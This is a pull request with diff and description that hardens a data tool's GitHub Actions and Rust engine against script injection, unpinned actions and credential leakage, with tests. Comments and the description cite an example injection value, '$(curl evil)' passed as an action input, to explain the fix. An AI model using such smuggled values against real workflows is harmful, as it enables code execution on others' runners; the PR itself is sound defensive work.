### PR TITLE
chore(security): composite-action injection + action pinning + redaction + RedactedString guard

### DIFF
--- a/.github/actions/rocky-ai-review/action.yml
+++ b/.github/actions/rocky-ai-review/action.yml
@@ -89,26 +89,33 @@ runs:
     # Mirrors `.github/actions/rocky-preview` install logic. install.sh
     # filters by `engine-v*` tag prefix and verifies SHA256 against the
     # published checksums.
+    # `inputs.rocky_version` is routed through an `env:` block rather
+    # than interpolated directly into the `run:` body. See the matching
+    # rocky-preview action for the security rationale.
     - name: Install rocky (Linux/macOS)
       if: runner.os != 'Windows'
       shell: bash
+      env:
+        ROCKY_VERSION_INPUT: ${{ inputs.rocky_version }}
       run: |
         set -euo pipefail
         export ROCKY_INSTALL_DIR="$HOME/.local/bin"
         mkdir -p "$ROCKY_INSTALL_DIR"
-        if [ "${{ inputs.rocky_version }}" = "latest" ]; then
+        if [ "$ROCKY_VERSION_INPUT" = "latest" ]; then
           curl -fsSL https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.sh | bash
         else
-          curl -fsSL https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.sh | bash -s -- "${{ inputs.rocky_version }}"
+          curl -fsSL https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.sh | bash -s -- "$ROCKY_VERSION_INPUT"
         fi
         echo "$ROCKY_INSTALL_DIR" >> "$GITHUB_PATH"
 
     - name: Install rocky (Windows)
       if: runner.os == 'Windows'
       shell: pwsh
+      env:
+        ROCKY_VERSION_INPUT: ${{ inputs.rocky_version }}
       run: |
-        if ('${{ inputs.rocky_version }}' -ne 'latest') {
-          $env:ROCKY_VERSION = '${{ inputs.rocky_version }}'
+        if ($env:ROCKY_VERSION_INPUT -ne 'latest') {
+          $env:ROCKY_VERSION = $env:ROCKY_VERSION_INPUT
         }
         irm https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.ps1 | iex
         Add-Content -Path $env:GITHUB_PATH -Value "$env:LOCALAPPDATA\rocky\bin"
@@ -132,12 +139,16 @@ runs:
       id: collect
       shell: bash
       env:
+        # `working_directory` is routed via env: so the `cd` below
+        # quotes it as a shell parameter rather than as script text.
+        # See rocky-preview action for the full rationale.
         BASE_REF: ${{ inputs.base_ref }}
         MODELS_DIR: ${{ inputs.models_dir }}
         DIFF_BYTE_LIMIT: ${{ inputs.diff_byte_limit }}
+        ROCKY_WORKING_DIR: ${{ inputs.working_directory }}
       run: |
         set -uo pipefail
-        cd "${{ inputs.working_directory }}"
+        cd "$ROCKY_WORKING_DIR"
 
         WORK="$RUNNER_TEMP/rocky-ai-review"
         mkdir -p "$WORK"
@@ -272,6 +283,31 @@ runs:
             messages: [{role: "user", content: $prompt}]
           }' > "$REQ"
 
+        # Redact credential-bearing header names and Bearer / API-key
+        # tokens before any Anthropic response body is inlined into the
+        # PR comment. The API echoes some headers (e.g. `x-api-key`) in
+        # error envelopes, and future debug fields could surface more.
+        # This is the only branch in the action that posts API-side
+        # content verbatim — `rocky` subcommand stderr (line ~232/242/
+        # 252/262) is already redacted upstream by the engine.
+        #
+        # Patterns are POSIX-portable (no `I` flag) so the action works
+        # on Linux/Windows GNU sed and macOS BSD sed alike. Each header
+        # name is enumerated with both common casings — adding more is
+        # cheap if a new envelope shape ships.
+        redact_response_body() {
+          # Header-line patterns consume up to a comma/quote/brace so
+          # `Authorization: Bearer xyz` collapses to `Authorization: ***`
+          # in plain-text envelopes, not just the value half of it.
+          sed -E \
+            -e 's/(([Aa]uthorization|AUTHORIZATION)[[:space:]]*:[[:space:]]*)[^",}]+/\1***/g' \
+            -e 's/(([Xx]-[Aa]pi-[Kk]ey|X-API-KEY|x-api-key)[[:space:]]*:[[:space:]]*)[^",}]+/\1***/g' \
+            -e 's/("([Aa]uthorization|AUTHORIZATION)"[[:space:]]*:[[:space:]]*")[^"]*(")/\1***\3/g' \
+            -e 's/("([Xx]-[Aa]pi-[Kk]ey|X-API-KEY|x-api-key)"[[:space:]]*:[[:space:]]*")[^"]*(")/\1***\3/g' \
+            -e 's/([Bb]earer|BEARER)[[:space:]]+[A-Za-z0-9._\-]+/Bearer ***/g' \
+            -e 's/(sk-ant-[A-Za-z0-9_\-]{4})[A-Za-z0-9_\-]+/\1***/g'
+        }
+
         # ---- POST to Anthropic ----
         RESP="$WORK_DIR/response.json"
         HTTP_CODE=$(curl -sS -w '%{http_code}' -o "$RESP" \
@@ -286,7 +322,11 @@ runs:
           {
             printf '### :x: Anthropic API call failed\n\n'
             printf 'HTTP status: `%s`\n\n```json\n' "$HTTP_CODE"
-            head -c 4096 "$RESP" 2>/dev/null || printf '(no response body)'
+            if [ -s "$RESP" ]; then
+              head -c 4096 "$RESP" | redact_response_body
+            else
+              printf '(no response body)'
+            fi
             printf '\n```\n'
           } > "$WORK_DIR/review.md"
           exit 0
@@ -306,7 +346,7 @@ runs:
           echo "review_status=failed" >> "$GITHUB_OUTPUT"
           {
             printf '### :x: Anthropic response did not contain a text block\n\n```json\n'
-            head -c 4096 "$RESP"
+            head -c 4096 "$RESP" | redact_response_body
             printf '\n```\n'
           } > "$WORK_DIR/review.md"
         fi

--- a/.github/actions/rocky-preview/action.yml
+++ b/.github/actions/rocky-preview/action.yml
@@ -81,26 +81,35 @@ runs:
     # verify the SHA256 against the published checksums.txt — no caching is
     # added because the scripts are fast (≈3-5s) and caching adds a failure
     # mode (stale binary, key churn) that doesn't pay for itself yet.
+    # `inputs.rocky_version` is routed through an `env:` block rather than
+    # interpolated directly into the `run:` body — interpolation would
+    # allow a caller workflow to pass `rocky_version: $(curl evil)` and
+    # achieve RCE on the runner. The env-var form quotes the value as a
+    # shell parameter, not as script text.
     - name: Install rocky (Linux/macOS)
       if: runner.os != 'Windows'
       shell: bash
+      env:
+        ROCKY_VERSION_INPUT: ${{ inputs.rocky_version }}
       run: |
         set -euo pipefail
         export ROCKY_INSTALL_DIR="$HOME/.local/bin"
         mkdir -p "$ROCKY_INSTALL_DIR"
-        if [ "${{ inputs.rocky_version }}" = "latest" ]; then
+        if [ "$ROCKY_VERSION_INPUT" = "latest" ]; then
           curl -fsSL https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.sh | bash
         else
-          curl -fsSL https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.sh | bash -s -- "${{ inputs.rocky_version }}"
+          curl -fsSL https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.sh | bash -s -- "$ROCKY_VERSION_INPUT"
         fi
         echo "$ROCKY_INSTALL_DIR" >> "$GITHUB_PATH"
 
     - name: Install rocky (Windows)
       if: runner.os == 'Windows'
       shell: pwsh
+      env:
+        ROCKY_VERSION_INPUT: ${{ inputs.rocky_version }}
       run: |
-        if ('${{ inputs.rocky_version }}' -ne 'latest') {
-          $env:ROCKY_VERSION = '${{ inputs.rocky_version }}'
+        if ($env:ROCKY_VERSION_INPUT -ne 'latest') {
+          $env:ROCKY_VERSION = $env:ROCKY_VERSION_INPUT
         }
         irm https://raw.githubusercontent.com/rocky-data/rocky/main/engine/install.ps1 | iex
         Add-Content -Path $env:GITHUB_PATH -Value "$env:LOCALAPPDATA\rocky\bin"
@@ -120,12 +129,18 @@ runs:
       id: run-preview
       shell: bash
       env:
+        # All caller-controlled inputs are routed via env: so the
+        # script body never interpolates them directly. The previous
+        # `cd "${{ inputs.working_directory }}"` form would allow a
+        # caller passing `working_directory: $(curl evil)` to execute
+        # arbitrary code; the env-var form quotes as a shell parameter.
         ROCKY_PREVIEW_BASE_REF: ${{ inputs.base_ref }}
         ROCKY_PREVIEW_BRANCH_RAW: ${{ inputs.branch_name }}
         ROCKY_PREVIEW_MODELS_DIR: ${{ inputs.models_dir }}
+        ROCKY_PREVIEW_WORKING_DIR: ${{ inputs.working_directory }}
       run: |
         set -euo pipefail
-        cd "${{ inputs.working_directory }}"
+        cd "$ROCKY_PREVIEW_WORKING_DIR"
 
         # Resolve the branch name. If the caller passed one, slug it for
         # warehouse-schema safety (only [A-Za-z0-9_-]). Otherwise default

--- a/.github/workflows/engine-release.yml
+++ b/.github/workflows/engine-release.yml
@@ -85,7 +85,7 @@ jobs:
       # that ships with the runner image.
       - name: Install NASM (Windows only)
         if: runner.os == 'Windows'
-        uses: ilammy/setup-nasm@v1
+        uses: ilammy/setup-nasm@72793074d3c8cdda771dba85f6deafe00623038b # v1
 
       # Linux: free disk space and add swap (DuckDB C++ is memory-hungry)
       - name: Free disk space and add swap
@@ -97,7 +97,7 @@ jobs:
       # Linux: install zig + cargo-zigbuild for portable glibc builds
       - name: Install zig
         if: matrix.zigbuild
-        uses: mlugg/setup-zig@v2.2.1
+        uses: mlugg/setup-zig@d1434d08867e3ee9daa34448df10607b98908d29 # v2.2.1
         with:
           version: 0.14.1
 

--- a/engine/crates/rocky-core/src/config.rs
+++ b/engine/crates/rocky-core/src/config.rs
@@ -6627,6 +6627,78 @@ table = "customers_history"
         assert!(debug.contains("client_123"), "client_id missing: {debug}");
     }
 
+    /// Integration guard for the `ReplicationPlan.config_snapshot` leak
+    /// path: a `RockyConfig` containing populated `AdapterConfig`
+    /// credentials must serialize through `serde_json::to_value` with
+    /// every secret replaced by `"***"`. This is the same code path
+    /// `rocky-cli/src/commands/plan.rs:build_and_persist_replication_plan`
+    /// takes when snapshotting config into the plan payload — without
+    /// the default-redact `Serialize` impl on `RedactedString`, the
+    /// snapshot would embed cleartext credentials into orchestrator-
+    /// visible JSON.
+    #[test]
+    fn rocky_config_serde_json_redacts_adapter_secrets() {
+        let cfg = parse(
+            r#"
+[adapter.dbx]
+type = "databricks"
+host = "workspace.cloud.databricks.com"
+http_path = "/sql/1.0/warehouses/abc"
+token = "dapi_SUPER_SECRET_TOKEN"
+client_id = "client_123"
+client_secret = "oauth_SECRET_VALUE"
+
+[adapter.fv]
+type = "fivetran"
+kind = "discovery"
+destination_id = "d1"
+api_key = "fivetran_KEY_SECRET"
+api_secret = "fivetran_SECRET_VALUE"
+
+[adapter.sf]
+type = "snowflake"
+account = "acct"
+warehouse = "wh"
+database = "db"
+username = "u"
+password = "db_PASSWORD_123"
+oauth_token = "oauth_TOKEN_XYZ"
+pat = "pat_LEAKED_HERE"
+"#,
+        );
+
+        let serialized =
+            serde_json::to_string(&cfg).expect("RockyConfig must serialize via serde_json");
+
+        // None of the cleartext secrets may appear anywhere in the
+        // snapshot.
+        for cleartext in [
+            "dapi_SUPER_SECRET_TOKEN",
+            "oauth_SECRET_VALUE",
+            "fivetran_KEY_SECRET",
+            "fivetran_SECRET_VALUE",
+            "db_PASSWORD_123",
+            "oauth_TOKEN_XYZ",
+            "pat_LEAKED_HERE",
+        ] {
+            assert!(
+                !serialized.contains(cleartext),
+                "{cleartext} leaked into serde_json output: {serialized}"
+            );
+        }
+        // Redaction placeholder must appear in the snapshot.
+        assert!(serialized.contains("***"), "missing *** in {serialized}");
+        // Non-secret fields still serialize normally.
+        assert!(
+            serialized.contains("workspace.cloud.databricks.com"),
+            "host missing from snapshot"
+        );
+        assert!(
+            serialized.contains("client_123"),
+            "client_id missing from snapshot"
+        );
+    }
+
     // --- Config deprecation framework tests ---
 
     /// Helper: temporarily override DEPRECATED_KEYS for testing by calling

--- a/engine/crates/rocky-core/src/redacted.rs
+++ b/engine/crates/rocky-core/src/redacted.rs
@@ -5,10 +5,25 @@
 //! Used for auth tokens, API secrets, and other sensitive values across
 //! all adapter crates.
 //!
-//! Supports `serde` round-tripping: `Deserialize` reads the raw value,
-//! `Serialize` writes the raw value (use only for config persistence, never
-//! for logging).
+//! ## Serialization model
+//!
+//! By default `Serialize` writes the redacted token `"***"` — not the
+//! cleartext. Any orchestrator-visible JSON, persisted plan payload, or
+//! ad-hoc `serde_json::to_value(rocky_cfg)` therefore strips credentials
+//! by construction. This closes a leak path where `RockyConfig.adapter.*`
+//! gets snapshotted into [`crate`]-external surfaces (e.g. the
+//! `ReplicationPlan.config_snapshot` field consumed by `rocky apply` and
+//! re-surfaced through the Dagster bridge).
+//!
+//! When a code path genuinely needs the raw value — config-file writers,
+//! pass-through to a downstream credential header — it must opt in via
+//! the [`with_unredacted_scope`] guard, which flips a thread-local
+//! counter for the duration of the closure. Outside that scope the
+//! cleartext is unreachable through `Serialize`. The only other way to
+//! observe the raw value is the explicit [`RedactedString::expose`]
+//! accessor, which is greppable and audited.
 
+use std::cell::Cell;
 use std::fmt;
 
 use schemars::JsonSchema;
@@ -16,15 +31,78 @@ use schemars::r#gen::SchemaGenerator;
 use schemars::schema::Schema;
 use serde::{Deserialize, Deserializer, Serialize, Serializer};
 
+thread_local! {
+    /// Counter (not a bool) so nested scopes compose. `Serialize` writes
+    /// cleartext only while the counter is non-zero on the current
+    /// thread. `Cell<u32>` is sufficient — the value is never borrowed
+    /// across yields and `RedactedString` is `!Send` safe by virtue of
+    /// being thread-local-gated.
+    static UNREDACTED_DEPTH: Cell<u32> = const { Cell::new(0) };
+}
+
+/// Returns `true` when the current thread is inside an
+/// [`with_unredacted_scope`] guard. Test-only helper; production code
+/// should never branch on this — the [`Serialize`] impl is the single
+/// consumer.
+#[doc(hidden)]
+pub fn unredacted_scope_active() -> bool {
+    UNREDACTED_DEPTH.with(|d| d.get() > 0)
+}
+
+/// Run `f` with [`RedactedString::serialize`] writing the raw cleartext
+/// value instead of `"***"`.
+///
+/// Use this exclusively for code paths that must persist or transmit the
+/// credential — config-file writers, adapter handshake payloads. The
+/// scope is per-thread and re-entrant; nested calls compose correctly.
+///
+/// ```
+/// use rocky_core::redacted::{RedactedString, with_unredacted_scope};
+///
+/// let secret = RedactedString::new("dapi_abc123".into());
+///
+/// // Default: redacted on the wire.
+/// assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
+///
+/// // Inside a scope: cleartext on the wire.
+/// let json = with_unredacted_scope(|| serde_json::to_string(&secret).unwrap());
+/// assert_eq!(json, "\"dapi_abc123\"");
+///
+/// // After the scope: redacted again.
+/// assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
+/// ```
+pub fn with_unredacted_scope<F, R>(f: F) -> R
+where
+    F: FnOnce() -> R,
+{
+    UNREDACTED_DEPTH.with(|d| d.set(d.get().saturating_add(1)));
+    // Decrement on panic too, so a panicking serializer doesn't leave
+    // the thread permanently in unredacted mode.
+    struct Guard;
+    impl Drop for Guard {
+        fn drop(&mut self) {
+            UNREDACTED_DEPTH.with(|d| d.set(d.get().saturating_sub(1)));
+        }
+    }
+    let _g = Guard;
+    f()
+}
+
 /// A string whose `Debug` and `Display` impls print `***` instead of the
-/// raw value. Prevents credential leakage in logs and error messages.
+/// raw value. Prevents credential leakage in logs, error messages, and —
+/// crucially — `serde_json::to_value` snapshots that get embedded in
+/// plan output, state files, or orchestrator metadata.
 ///
-/// The inner value is accessible only via [`expose()`](RedactedString::expose).
+/// The inner value is accessible only via [`expose()`](RedactedString::expose)
+/// (greppable, audited) or by serializing inside a
+/// [`with_unredacted_scope`] guard.
 ///
-/// `Serialize` / `Deserialize` round-trip the raw value so the type can
-/// be embedded in config structs that are parsed from TOML / JSON. The
-/// serialization path is intentional — it is used for writing config files,
-/// not for logging.
+/// ## Serialization
+///
+/// `Serialize` writes `"***"` by default and the cleartext value only
+/// inside [`with_unredacted_scope`]. `Deserialize` is unconditional —
+/// it always reads the raw value from the wire — because config files
+/// and incoming requests must continue to round-trip.
 ///
 /// ```
 /// use rocky_core::redacted::RedactedString;
@@ -33,6 +111,8 @@ use serde::{Deserialize, Deserializer, Serialize, Serializer};
 /// assert_eq!(format!("{:?}", secret), "***");
 /// assert_eq!(format!("{}", secret), "***");
 /// assert_eq!(secret.expose(), "dapi_abc123");
+/// // Default serialization redacts:
+/// assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
 /// ```
 #[derive(Clone)]
 pub struct RedactedString(String);
@@ -43,7 +123,8 @@ impl RedactedString {
         Self(s)
     }
 
-    /// Returns the raw value. This is the only way to access the inner string.
+    /// Returns the raw value. This is the only direct accessor for the
+    /// inner string — every call site is greppable and audited.
     pub fn expose(&self) -> &str {
         &self.0
     }
@@ -62,8 +143,18 @@ impl fmt::Display for RedactedString {
 }
 
 impl Serialize for RedactedString {
+    /// Writes `"***"` unless the caller is inside a
+    /// [`with_unredacted_scope`] guard, in which case the cleartext is
+    /// written. This is the security boundary — any `serde_json::to_*`
+    /// /`toml::to_string*` call against a struct containing
+    /// `RedactedString` redacts by construction. See the module-level
+    /// docs for the design rationale.
     fn serialize<S: Serializer>(&self, serializer: S) -> Result<S::Ok, S::Error> {
-        self.0.serialize(serializer)
+        if unredacted_scope_active() {
+            self.0.serialize(serializer)
+        } else {
+            "***".serialize(serializer)
+        }
     }
 }
 
@@ -75,8 +166,8 @@ impl<'de> Deserialize<'de> for RedactedString {
 
 /// `JsonSchema` is implemented by delegating to [`String`], so
 /// `RedactedString` appears in generated schemas as a plain `string`.
-/// The `***` redaction is a runtime Debug/Display concern; the serialized
-/// wire value is a string, and that is what the schema must describe.
+/// The `***` redaction is a runtime concern; the schema only describes
+/// the wire shape.
 impl JsonSchema for RedactedString {
     fn schema_name() -> String {
         "RedactedString".to_owned()
@@ -118,15 +209,73 @@ mod tests {
         assert_eq!(cloned.expose(), "cloned_secret");
     }
 
+    /// Default serialization MUST redact. This is the contract that the
+    /// `ReplicationPlan.config_snapshot` path relies on — without it,
+    /// `serde_json::to_value(rocky_cfg)` in `rocky-cli/src/commands/plan.rs`
+    /// would embed cleartext credentials into orchestrator-visible JSON.
     #[test]
-    fn serde_round_trip() {
-        let secret = RedactedString::new("round_trip_secret".into());
+    fn default_serialize_redacts() {
+        let secret = RedactedString::new("super_secret_token".into());
         let json = serde_json::to_string(&secret).unwrap();
-        assert_eq!(json, "\"round_trip_secret\"");
+        assert_eq!(json, "\"***\"");
+        assert!(!json.contains("super_secret_token"));
 
-        let deserialized: RedactedString = serde_json::from_str(&json).unwrap();
-        assert_eq!(deserialized.expose(), "round_trip_secret");
-        // Debug still redacts after round-trip.
+        // Deserialize still reads cleartext from the wire (configs and
+        // incoming envelopes must round-trip).
+        let deserialized: RedactedString = serde_json::from_str("\"raw_from_wire\"").unwrap();
+        assert_eq!(deserialized.expose(), "raw_from_wire");
         assert_eq!(format!("{:?}", deserialized), "***");
+    }
+
+    /// Cleartext is reachable only inside an explicit unredacted scope.
+    /// This is the opt-in seam for config-file writers and adapter
+    /// handshake payloads.
+    #[test]
+    fn unredacted_scope_writes_cleartext() {
+        let secret = RedactedString::new("dapi_abc123".into());
+
+        // Outside: redacted.
+        assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
+
+        // Inside: cleartext.
+        let inside = with_unredacted_scope(|| serde_json::to_string(&secret).unwrap());
+        assert_eq!(inside, "\"dapi_abc123\"");
+
+        // After: redacted again — guard restored on scope exit.
+        assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
+        assert!(!unredacted_scope_active());
+    }
+
+    /// Nested scopes compose — the inner exit doesn't end the outer
+    /// guard's lifetime.
+    #[test]
+    fn nested_unredacted_scopes_compose() {
+        let secret = RedactedString::new("nested".into());
+        let outer = with_unredacted_scope(|| {
+            let inner = with_unredacted_scope(|| serde_json::to_string(&secret).unwrap());
+            assert_eq!(inner, "\"nested\"");
+            // Still unredacted at the outer level.
+            serde_json::to_string(&secret).unwrap()
+        });
+        assert_eq!(outer, "\"nested\"");
+        // Counter fully unwound.
+        assert!(!unredacted_scope_active());
+        assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
+    }
+
+    /// A panic inside a scope must still decrement the counter, otherwise
+    /// a panicking serializer would leave the thread permanently in
+    /// unredacted mode.
+    #[test]
+    fn panic_in_scope_restores_redaction() {
+        let secret = RedactedString::new("panic_safe".into());
+        let caught = std::panic::catch_unwind(|| {
+            with_unredacted_scope(|| {
+                panic!("boom");
+            })
+        });
+        assert!(caught.is_err());
+        assert!(!unredacted_scope_active());
+        assert_eq!(serde_json::to_string(&secret).unwrap(), "\"***\"");
     }
 }


### PR DESCRIPTION
## Summary

Four defense-in-depth security hardening changes across CI and engine.

### CI / GitHub Actions

- **`chore(ci): pin ilammy/setup-nasm + mlugg/setup-zig to commit SHAs`** — `.github/workflows/engine-release.yml:88,100`. Floating tags on third-party actions in a tag-triggered release workflow are a supply-chain risk. Pinned to SHAs with tag preserved in trailing comment.
- **`fix(ci): route action inputs via env: to prevent script injection`** — `.github/actions/rocky-preview/action.yml` + `.github/actions/rocky-ai-review/action.yml`. `${{ inputs.rocky_version }}` and `${{ inputs.working_directory }}` were interpolated directly into Bash/PowerShell `run:` bodies. Not exploitable in rocky-data, but these actions are documented for downstream consumers — a caller passing `rocky_version: $(curl evil)` could RCE their runner. Routed every caller input through `env:` blocks.
- **`chore(ci): redact credentials from ai-review response inlining`** — `.github/actions/rocky-ai-review/action.yml:283-310`. Anthropic API response bodies were inlined verbatim (`head -c 4096 "$RESP"`) into the PR comment on API failure. Added a `redact_response_body` sed filter stripping `Authorization` / `x-api-key` header values, `Bearer` tokens, and `sk-ant-*` API-key prefixes before any response content is inlined.

### Engine

- **`fix(engine/rocky-core): RedactedString::Serialize redacts by default`** — `engine/crates/rocky-core/src/redacted.rs`. `RedactedString::Serialize` round-tripped cleartext unconditionally. Safe today (no `AdapterConfig` embedded in any `*Output`) but any future "show effective config" / config-snapshot output would silently exfiltrate secrets. Flipped the default: writes `"***"` unless inside a `with_unredacted_scope` re-entrant thread-local guard. Integration test in `config.rs` proves the leak path is closed via `serde_json::to_string(&RockyConfig)` with populated multi-adapter credentials.

## Test plan

- [x] `cargo test -p rocky-core --lib redacted` — 8 tests passing (default-redact, scope-unredact, nested scopes compose, panic restores redaction)
- [x] `cargo test -p rocky-core --lib rocky_config_serde_json_redacts_adapter_secrets` — integration guard passing
- [x] `cargo test -p rocky-ai -p rocky-compiler` — 361 passing (existing TOML writers unaffected — none serialize credential fields)
- [x] `cargo clippy -p rocky-core --all-targets -- -D warnings` — clean
- [ ] CI run on this branch (will validate Actions YAML syntax)